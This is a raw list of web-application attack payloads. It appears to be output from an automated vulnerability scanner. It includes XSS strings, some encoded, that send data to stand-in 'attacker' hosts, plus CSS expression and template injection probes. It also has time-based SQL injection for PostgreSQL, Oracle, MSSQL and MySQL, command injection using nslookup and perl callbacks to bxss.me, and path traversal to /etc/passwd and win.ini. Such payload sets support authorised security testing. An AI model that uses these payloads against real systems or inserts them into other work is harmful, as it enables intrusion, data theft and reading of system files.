http://attacker-9558/log.php?
}body{acu:Expre/**/SSion(GDGp(9697))}
\u003CScRiPt\GDGp(9390)\u003C/sCripT\u003E
%0A%3C%53%63%52%69%50%74%20%3E%47%44%47%70%289516%29%3C%2F%73%43%72%69%70%54%3E
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
acx__${98991*97996}__::.x
http://attacker-9089/log.php?
}body{acu:Expre/**/SSion(nbUO(9766))}
\u003CScRiPt\nbUO(9251)\u003C/sCripT\u003E
%0A%3C%53%63%52%69%50%74%20%3E%6E%62%55%4F%289517%29%3C%2F%73%43%72%69%70%54%3E
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
acx__${98991*97996}__::.x
http://attacker-9615/log.php?
}body{acu:Expre/**/SSion(tGMh(9100))}
\u003CScRiPt\tGMh(9391)\u003C/sCripT\u003E
%0A%3C%53%63%52%69%50%74%20%3E%74%47%4D%68%289289%29%3C%2F%73%43%72%69%70%54%3E
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
acx__${98991*97996}__::.x
http://attacker-9271/log.php?
}body{acu:Expre/**/SSion(fxTV(9155))}
\u003CScRiPt\fxTV(9111)\u003C/sCripT\u003E
%0A%3C%53%63%52%69%50%74%20%3E%66%78%54%56%289725%29%3C%2F%73%43%72%69%70%54%3E
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
acx__${98991*97996}__::.x
acu10814<s1﹥s2ʺs3ʹuca10814
http://attacker-9679/log.php?
}body{acu:Expre/**/SSion(ftqs(9609))}
\u003CScRiPt\ftqs(9885)\u003C/sCripT\u003E
%0A%3C%53%63%52%69%50%74%20%3E%66%74%71%73%289325%29%3C%2F%73%43%72%69%70%54%3E
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
acx__${98991*97996}__::.x
http://attacker-9561/log.php?
}body{acu:Expre/**/SSion(KBSj(9177))}
\u003CScRiPt\KBSj(9794)\u003C/sCripT\u003E
%0A%3C%53%63%52%69%50%74%20%3E%4B%42%53%6A%289086%29%3C%2F%73%43%72%69%70%54%3E
''||(select 1 from (select pg_sleep(15))x)||''
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
acx__${98991*97996}__::.x
'||(select 1 from (select pg_sleep(15))x)||'
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
OmNbuklz')) OR 283=(SELECT 283 FROM PG_SLEEP(15))--
enqpsIV1') OR 766=(SELECT 766 FROM PG_SLEEP(15))--
8i8fepB0' OR 400=(SELECT 400 FROM PG_SLEEP(15))--
-1)) OR 148=(SELECT 148 FROM PG_SLEEP(15))--
-5) OR 278=(SELECT 278 FROM PG_SLEEP(15))--
-5 OR 868=(SELECT 868 FROM PG_SLEEP(15))--
1 waitfor delay '0:0:15' --
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(sele...
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
if(now()=sysdate(),sleep(15),0)
-1 OR 3+853-853-1=0+0+0+1
-1 OR 2+853-853-1=0+0+0+1
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
HttP://bxss.me/t/xss.html?%00
http://bxss.me/t/fit.txt?.jpg
1some_inexistent_file_with_long_name
ctime
sleep
p0
(I30
tp1
Rp2
.
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
`(nslookup hitozllqzpovf1b468.bxss.me||perl -e "
|(nslookup hitvpvlsueyjfa85b8.bxss.me||perl -e "
$(nslookup hitquybzqudsa5f5d9.bxss.me||perl -e "
(nslookup hitipjacaigre881aa.bxss.me||perl -e "
|echo btqmaj$()\ ajbeei\nz^xyu||a #'
echo ysykzi$()\ piimfb\nz^xyu||a #'
../../../../../../../../../../../../../../windows/win.ini
../../../../../../../../../../../../../../etc/passwd
bcc:074625.19373-128434.19373.55a38.19130.2@bxss.me
response.write(9557916*9363308)